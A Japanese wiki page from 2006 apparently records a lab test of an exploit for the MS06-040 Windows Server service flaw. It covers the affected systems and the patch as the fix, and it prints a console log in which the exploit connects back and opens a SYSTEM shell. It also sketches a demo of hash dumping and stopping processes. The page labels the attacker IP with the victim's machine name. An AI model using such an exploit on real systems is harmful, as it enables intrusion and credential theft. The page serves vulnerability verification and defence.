[[exploit:remote:windows:ms06-040]]
 
トレース: » 玄箱の初期化 » MS06-040:Server サービスの脆弱性により、リモートでコードが実行される
目次

MS06-040:Server サービスの脆弱性により、リモートでコードが実行される

更新履歴

  • 2006/08/15 検証環境・デモンストレーション追加
  • 2006/08/11 初版

概要

  • Serverサービスの脆弱性に対するExploit
  • このExploitを使用すると、任意のコードを実行可能
  • 今回の検証では攻撃元IPアドレスにコネクトバックさせる

影響を受けるシステム

  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP Service Pack 1 および Microsoft Windows XP Service Pack 2
  • Microsoft Windows XP Professional x64 Edition
  • Microsoft Windows Server 2003 for Itanium-based Systems および Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
  • Microsoft Windows Server 2003 x64 Edition

参考URL

Exploitの検証

検証環境

  • WindowsXP pro + SP1
  • Windows 2000 Server SP4 日本語版

検証結果

  • 攻撃先IPアドレス: 192.168.0.10
  • 攻撃元IPアドレス: 192.168.0.12(マシン名:VICTIM-XP)
  • 攻撃元からExploitコードを実行
[*] Starting Reverse Handler.
[*] Detected a Windows XP target
[*] This will not work on SP2!
[*] Sending request...
[*] The server rejected it, trying again...
[*] Got connection from 192.168.0.10:6666 <-> 192.168.0.12:1035

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>hostname
hostname
victim-xp

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter ローカル エリア接続:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 192.168.0.12
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 192.168.0.254

C:\WINDOWS\system32>

対処方法

  1. MS06-040 パッチの適用 (Windows Update の実施)

備考

このExploit検証を行った、2006年8月11日現在リリースされているコードでは

  • WindowsXP + SP1(日本語版)のみの攻撃成功を確認できている。
  • WindowsXP + SP2(日本語版)では攻撃は成立せず
  • Windows2000 + SP4(日本語版)では再起動が発生することが確認できた。

しかし、影響を受けると発表されているOSにおいて、攻撃が成立するコードがリリースされ、この脆弱性を利用したワームなどの発生も時間の問題であると考えられる。それに、備え、充分な動作検証を行った後、修正パッチの適用を行うことが推奨される。

2006/08/15 追記

2006年8月11日に再リリースされた攻撃コードでは、Windows2000 Server SP4 日本語版でも攻撃が可能であることを確認した。

デモンストレーション

  • Exploitを実行して、攻撃元PCから、ターゲットPCのSYSTEM権限を取得する。
  • SYSTEM権限を奪取後、ハッシュダンプの取得および特定プロセスの停止を行う。
    • 攻撃元PC
      • IPアドレス:10.10.10.15
    • ターゲットPC
      • IPアドレス:10.10.10.3
      • OS:Windows 2000 Server SP4 日本語版
      • コンピュータ名:vm-w2k

 
exploit/remote/windows/ms06-040.txt · 最終更新: 2007/10/16 12:02
 
Recent changes RSS feed Creative Commons License Donate Powered by PHP Valid XHTML 1.0 Valid CSS Driven by DokuWiki NINJA TOOLS